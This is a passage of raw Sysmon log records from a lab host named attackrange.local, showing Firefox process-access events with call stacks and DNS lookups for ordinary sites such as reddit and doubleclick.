Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.284{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.276{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.266{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.250{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.233{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.971{59A5CD1D-8E56-6005-2E00-00000000A301}246420.88.84.99.in-addr.arpa.0type: 12 server-99-84-88-20.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000017665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.971{59A5CD1D-8E56-6005-2E00-00000000A301}2464130.117.84.104.in-addr.arpa.0type: 12 a104-84-117-130.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.507{59A5CD1D-945A-6005-3305-00000000A301}7052unbouncepages.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.505{59A5CD1D-945A-6005-3305-00000000A301}7052unbouncepages.com054.93.101.66;18.196.95.178;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.505{59A5CD1D-945A-6005-3305-00000000A301}7052go.helixsleep.com0type: 5 unbouncepages.com;::ffff:18.196.95.178;::ffff:54.93.101.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:26.501{59A5CD1D-945A-6005-3305-00000000A301}7052lps.innogames.com02a00:1f78:fffd::d430:6225;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.499{59A5CD1D-945A-6005-3305-00000000A301}7052lps.innogames.com0212.48.98.37;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.499{59A5CD1D-945A-6005-3305-00000000A301}7052om.forgeofempires.com0type: 5 lps.innogames.com;::ffff:212.48.98.37;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.360{59A5CD1D-945A-6005-3305-00000000A301}7052v.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.087{59A5CD1D-945A-6005-3305-00000000A301}7052www.redditmedia.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:26.020{59A5CD1D-945A-6005-3305-00000000A301}7052gql.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.611{59A5CD1D-945A-6005-3305-00000000A301}7052e12767.d.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:25.609{59A5CD1D-945A-6005-3305-00000000A301}7052e12767.d.akamaiedge.net0104.84.117.130;C:\Program Files\Mozilla Firefox\firefox.exe 
10341000x800000000000000017653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.884{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.883{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.785{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.785{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.609{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.250{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.241{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.225{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.984{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.950{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.947{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.854{59A5CD1D-945A-6005-3305-00000000A301}7052i.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.303{59A5CD1D-945A-6005-3305-00000000A301}7052alb.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.280{59A5CD1D-945A-6005-3305-00000000A301}7052l3.aaxads.com0type: 5 wildcard.aaxads.com.edgekey.net;type: 5 e12767.d.akamaiedge.net;::ffff:104.84.117.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.254{59A5CD1D-945A-6005-3305-00000000A301}7052strapi.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.097{59A5CD1D-945A-6005-3305-00000000A301}7052e11089.d.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.094{59A5CD1D-945A-6005-3305-00000000A301}7052e11089.d.akamaiedge.net0104.84.114.168;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.093{59A5CD1D-945A-6005-3305-00000000A301}7052www.aaxdetect.com0type: 
5 wildcard.aaxdetect.com.edgekey.net;type: 5 e11089.d.akamaiedge.net;::ffff:104.84.114.168;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.067{59A5CD1D-945A-6005-3305-00000000A301}7052partnerad.l.doubleclick.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.066{59A5CD1D-945A-6005-3305-00000000A301}7052partnerad.l.doubleclick.net0142.250.74.194;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.065{59A5CD1D-945A-6005-3305-00000000A301}7052securepubads.g.doubleclick.net0type: 5 partnerad.l.doubleclick.net;::ffff:142.250.74.194;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.927{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.927{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.901{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.888{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.791{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+1104f81|C:\Program Files\Mozilla Firefox\xul.dll+270f3b4|C:\Program Files\Mozilla Firefox\xul.dll+270fdde|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000017699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.791{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
